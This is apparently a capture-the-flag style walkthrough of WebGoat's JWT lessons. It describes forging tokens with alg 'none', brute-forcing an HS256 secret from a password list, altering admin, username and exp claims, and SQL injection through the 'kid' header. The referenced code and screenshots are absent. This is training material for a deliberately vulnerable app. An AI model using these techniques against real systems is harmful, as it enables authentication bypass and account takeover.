JWT Token
3/
Use jwt.io to decode token, you will get username.
5/
After decode, you will see algorithm is HS256 and admin is false.
First, edit alg to "none". Next edit admin value to "true"
Edit cookie and send:
8/
First, we must to find key of this token, after that change the username field in this token to 'WebGoat' to solve this challenge (The algorithm is HS256).
I use 1000000-password-seclists.txt to brute force.
Code to find key:
I found that the key is victory, use this key to decode and change username to WebGoat:
And then when We submit we will receive message that the jwt token is expired:
Change exp value and submit token again, we will solve this challenge:
10/
This challenge is similar to challenge 5.
Go to file logs.txt, we will get token:
Modify request with Burpsuite, we will see Authorization header:
We will edit the token we got and then use it to set value for Authorization header:
The algorithm is "None":
Edit admin field to "true":
Send request with new token, we will solve the challenge:
11/
First, use jwt.io to decode:
In header, you will see "kid", It seems different from other challenges.
Take a look at source code in WebGoat's github:
Here we can see, the key will be selected from the database where id=kid. We can use SQLI to make it return your own key:
Some thing we can use like this:
When the query is executed, the key use to encode jwt is 'key' (your own key).
But one more step, you can see, before use this value as a key for jwt, it must be base64 decode first:
So we must edit the value for kid o to:
And finally, edit username to "Tom", delete exp and use 'key' as key:
Submit new token and solve the challenge:
Last updated